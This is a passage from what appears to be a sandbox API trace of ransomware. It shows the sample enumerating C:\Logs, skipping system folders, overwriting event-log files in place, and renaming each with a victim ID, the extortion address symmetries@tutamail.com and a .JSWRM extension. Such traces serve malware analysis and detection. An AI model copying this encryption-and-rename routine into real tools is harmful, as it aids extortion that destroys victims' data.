lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0065.602] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0065.602] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0065.602] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0065.602] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0065.602] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0065.603] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0065.603] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224b30 [0065.603] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0065.603] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224b30 | out: hHeap=0x1e0000) returned 1 [0065.603] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11c) returned 0x23ede0 [0065.603] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0065.603] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0065.603] MoveFileW (lpExistingFileName="C:\\Logs\\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-diagnosis-dps%4operational.evtx"), lpNewFileName="C:\\Logs\\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\logs\\microsoft-windows-diagnosis-dps%4operational.evtx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0065.603] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ede0 | out: hHeap=0x1e0000) returned 1 [0065.603] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224f70 | out: hHeap=0x1e0000) returned 1 [0065.603] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0065.603] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0065.603] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0065.603] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfd9ec80, ftCreationTime.dwHighDateTime=0x1d1a04f, ftLastAccessTime.dwLowDateTime=0xfd9ec80, ftLastAccessTime.dwHighDateTime=0x1d1a04f, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-Diagnostics-Performance%4Operational.evtx", cAlternateFileName="MIBE3D~1.EVT")) returned 1 [0065.603] lstrcmpiW (lpString1="Microsoft-Windows-Diagnostics-Performance%4Operational.evtx", lpString2=".") returned 1 [0065.603] lstrcmpiW (lpString1="Microsoft-Windows-Diagnostics-Performance%4Operational.evtx", lpString2="..") returned 1 [0065.603] lstrcmpiW (lpString1="Microsoft-Windows-Diagnostics-Performance%4Operational.evtx", lpString2="...") returned 1 [0065.604] lstrcmpiW (lpString1="Microsoft-Windows-Diagnostics-Performance%4Operational.evtx", lpString2="windows") returned -1 [0065.604] lstrcmpiW (lpString1="Microsoft-Windows-Diagnostics-Performance%4Operational.evtx", lpString2="recovery") returned -1 [0065.604] lstrcmpiW (lpString1="Microsoft-Windows-Diagnostics-Performance%4Operational.evtx", lpString2="perflogs") returned -1 [0065.604] lstrcmpiW (lpString1="Microsoft-Windows-Diagnostics-Performance%4Operational.evtx", lpString2="documents and settings") returned 1 [0065.604] lstrcmpiW (lpString1="Microsoft-Windows-Diagnostics-Performance%4Operational.evtx", lpString2="$RECYCLE.BIN") returned 1 [0065.604] lstrcmpiW (lpString1="Microsoft-Windows-Diagnostics-Performance%4Operational.evtx", lpString2="system volume information") returned -1 [0065.604] lstrcmpiW (lpString1="Microsoft-Windows-Diagnostics-Performance%4Operational.evtx", lpString2="msocache") returned -1 [0065.604] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0065.604] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-Diagnostics-Performance%4Operational.evtx", cchWideChar=59, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 59 [0065.604] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0065.604] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-Diagnostics-Performance%4Operational.evtx", cchWideChar=59, lpMultiByteStr=0x20e418, cbMultiByte=59, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-Diagnostics-Performance%4Operational.evtx", lpUsedDefaultChar=0x0) returned 59 [0065.604] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0065.604] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0065.604] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-Diagnostics-Performance%4Operational.evtx", cchWideChar=59, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 59 [0065.604] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0065.604] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-Diagnostics-Performance%4Operational.evtx", cchWideChar=59, lpMultiByteStr=0x20de78, cbMultiByte=59, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-Diagnostics-Performance%4Operational.evtx", lpUsedDefaultChar=0x0) returned 59 [0065.604] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0065.604] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0065.604] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225080 | out: hHeap=0x1e0000) returned 1 [0065.604] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0065.604] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f69c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0065.604] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0065.604] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-diagnostics-performance%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0065.604] GetFileSizeEx (in: hFile=0x450, lpFileSize=0x345f630 | out: lpFileSize=0x345f630*=69632) returned 1 [0065.604] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.604] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11000) returned 0x2481b0 [0065.605] ReadFile (in: hFile=0x450, lpBuffer=0x2481b0, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x345f63c, lpOverlapped=0x0 | out: lpBuffer=0x2481b0*, lpNumberOfBytesRead=0x345f63c*=0x11000, lpOverlapped=0x0) returned 1 [0065.618] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.618] WriteFile (in: hFile=0x450, lpBuffer=0x2481b0*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x345f638, lpOverlapped=0x0 | out: lpBuffer=0x2481b0*, lpNumberOfBytesWritten=0x345f638*=0x11000, lpOverlapped=0x0) returned 1 [0065.618] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2481b0 | out: hHeap=0x1e0000) returned 1 [0065.618] CloseHandle (hObject=0x450) returned 1 [0065.620] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0065.620] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0065.620] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0065.620] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f87c0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0065.620] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0065.620] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0065.620] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0065.620] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0065.620] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0065.620] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0065.620] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0065.620] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0065.620] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0065.620] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0065.620] MoveFileW (lpExistingFileName="C:\\Logs\\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-diagnostics-performance%4operational.evtx"), lpNewFileName="C:\\Logs\\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\logs\\microsoft-windows-diagnostics-performance%4operational.evtx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0065.624] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0065.624] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0065.624] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0065.624] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0065.624] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0065.624] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9658ef3, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc9658ef3, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-GroupPolicy%4Operational.evtx", cAlternateFileName="MIE38D~1.EVT")) returned 1 [0065.625] lstrcmpiW (lpString1="Microsoft-Windows-GroupPolicy%4Operational.evtx", lpString2=".") returned 1 [0065.625] lstrcmpiW (lpString1="Microsoft-Windows-GroupPolicy%4Operational.evtx", lpString2="..") returned 1 [0065.625] lstrcmpiW (lpString1="Microsoft-Windows-GroupPolicy%4Operational.evtx", lpString2="...") returned 1 [0065.625] lstrcmpiW (lpString1="Microsoft-Windows-GroupPolicy%4Operational.evtx", lpString2="windows") returned -1 [0065.625] lstrcmpiW (lpString1="Microsoft-Windows-GroupPolicy%4Operational.evtx", lpString2="recovery") returned -1 [0065.625] lstrcmpiW (lpString1="Microsoft-Windows-GroupPolicy%4Operational.evtx", lpString2="perflogs") returned -1 [0065.625] lstrcmpiW (lpString1="Microsoft-Windows-GroupPolicy%4Operational.evtx", lpString2="documents and settings") returned 1 [0065.625] lstrcmpiW (lpString1="Microsoft-Windows-GroupPolicy%4Operational.evtx", lpString2="$RECYCLE.BIN") returned 1 [0065.625] lstrcmpiW (lpString1="Microsoft-Windows-GroupPolicy%4Operational.evtx", lpString2="system volume information") returned -1 [0065.625] lstrcmpiW (lpString1="Microsoft-Windows-GroupPolicy%4Operational.evtx", lpString2="msocache") returned -1 [0065.625] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232e88 [0065.625] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-GroupPolicy%4Operational.evtx", cchWideChar=47, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 47 [0065.625] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0065.625] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-GroupPolicy%4Operational.evtx", cchWideChar=47, lpMultiByteStr=0x1f8328, cbMultiByte=47, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-GroupPolicy%4Operational.evtx", lpUsedDefaultChar=0x0) returned 47 [0065.625] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232e88 | out: hHeap=0x1e0000) returned 1 [0065.625] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c80 [0065.625] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-GroupPolicy%4Operational.evtx", cchWideChar=47, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 47 [0065.625] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0065.625] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-GroupPolicy%4Operational.evtx", cchWideChar=47, lpMultiByteStr=0x1f84e8, cbMultiByte=47, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-GroupPolicy%4Operational.evtx", lpUsedDefaultChar=0x0) returned 47 [0065.625] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c80 | out: hHeap=0x1e0000) returned 1 [0065.625] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2094b8 [0065.625] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0065.625] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0065.625] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f69c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0065.625] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209878 [0065.625] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-GroupPolicy%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-grouppolicy%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0065.626] GetFileSizeEx (in: hFile=0x450, lpFileSize=0x345f630 | out: lpFileSize=0x345f630*=69632) returned 1 [0065.626] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.626] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11000) returned 0x2481b0 [0065.626] ReadFile (in: hFile=0x450, lpBuffer=0x2481b0, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x345f63c, lpOverlapped=0x0 | out: lpBuffer=0x2481b0*, lpNumberOfBytesRead=0x345f63c*=0x11000, lpOverlapped=0x0) returned 1 [0065.631] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.631] WriteFile (in: hFile=0x450, lpBuffer=0x2481b0*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x345f638, lpOverlapped=0x0 | out: lpBuffer=0x2481b0*, lpNumberOfBytesWritten=0x345f638*=0x11000, lpOverlapped=0x0) returned 1 [0065.632] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2481b0 | out: hHeap=0x1e0000) returned 1 [0065.632] CloseHandle (hObject=0x450) returned 1 [0065.634] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209800 [0065.634] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0065.634] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0065.634] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8638, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0065.634] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8670 [0065.634] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0065.634] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0065.634] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0065.634] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0065.634] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0065.634] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2257f0 [0065.634] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0065.634] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2257f0 | out: hHeap=0x1e0000) returned 1 [0065.634] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11c) returned 0x23f970 [0065.634] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0065.634] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8670 | out: hHeap=0x1e0000) returned 1 [0065.634] MoveFileW (lpExistingFileName="C:\\Logs\\Microsoft-Windows-GroupPolicy%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-grouppolicy%4operational.evtx"), lpNewFileName="C:\\Logs\\Microsoft-Windows-GroupPolicy%4Operational.evtx.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\logs\\microsoft-windows-grouppolicy%4operational.evtx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0065.635] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f970 | out: hHeap=0x1e0000) returned 1 [0065.635] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209800 | out: hHeap=0x1e0000) returned 1 [0065.635] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209878 | out: hHeap=0x1e0000) returned 1 [0065.635] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0065.635] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0065.635] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9dcc480, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc9dcc480, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-HotspotAuth%4Operational.evtx", cAlternateFileName="MIE386~1.EVT")) returned 1 [0065.635] lstrcmpiW (lpString1="Microsoft-Windows-HotspotAuth%4Operational.evtx", lpString2=".") returned 1 [0065.635] lstrcmpiW (lpString1="Microsoft-Windows-HotspotAuth%4Operational.evtx", lpString2="..") returned 1 [0065.635] lstrcmpiW (lpString1="Microsoft-Windows-HotspotAuth%4Operational.evtx", lpString2="...") returned 1 [0065.635] lstrcmpiW (lpString1="Microsoft-Windows-HotspotAuth%4Operational.evtx", lpString2="windows") returned -1 [0065.635] lstrcmpiW (lpString1="Microsoft-Windows-HotspotAuth%4Operational.evtx", lpString2="recovery") returned -1 [0065.635] lstrcmpiW (lpString1="Microsoft-Windows-HotspotAuth%4Operational.evtx", lpString2="perflogs") returned -1 [0065.635] lstrcmpiW (lpString1="Microsoft-Windows-HotspotAuth%4Operational.evtx", lpString2="documents and settings") returned 1 [0065.635] lstrcmpiW (lpString1="Microsoft-Windows-HotspotAuth%4Operational.evtx", lpString2="$RECYCLE.BIN") returned 1 [0065.635] lstrcmpiW (lpString1="Microsoft-Windows-HotspotAuth%4Operational.evtx", lpString2="system volume information") returned -1 [0065.635] lstrcmpiW (lpString1="Microsoft-Windows-HotspotAuth%4Operational.evtx", lpString2="msocache") returned -1 [0065.635] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232d50 [0065.635] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-HotspotAuth%4Operational.evtx", cchWideChar=47, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 47 [0065.635] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0065.635] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-HotspotAuth%4Operational.evtx", cchWideChar=47, lpMultiByteStr=0x1f87c0, cbMultiByte=47, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-HotspotAuth%4Operational.evtx", lpUsedDefaultChar=0x0) returned 47 [0065.635] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232d50 | out: hHeap=0x1e0000) returned 1 [0065.635] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233090 [0065.636] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-HotspotAuth%4Operational.evtx", cchWideChar=47, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 47 [0065.636] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0065.636] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-HotspotAuth%4Operational.evtx", cchWideChar=47, lpMultiByteStr=0x1f8638, cbMultiByte=47, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-HotspotAuth%4Operational.evtx", lpUsedDefaultChar=0x0) returned 47 [0065.636] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233090 | out: hHeap=0x1e0000) returned 1 [0065.636] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209620 [0065.636] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2094b8 | out: hHeap=0x1e0000) returned 1 [0065.636] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0065.636] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f69c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0065.636] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209350 [0065.636] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-HotspotAuth%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-hotspotauth%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0065.637] GetFileSizeEx (in: hFile=0x450, lpFileSize=0x345f630 | out: lpFileSize=0x345f630*=69632) returned 1 [0065.637] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.637] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11000) returned 0x2481b0 [0065.637] ReadFile (in: hFile=0x450, lpBuffer=0x2481b0, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x345f63c, lpOverlapped=0x0 | out: lpBuffer=0x2481b0*, lpNumberOfBytesRead=0x345f63c*=0x11000, lpOverlapped=0x0) returned 1 [0065.642] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, 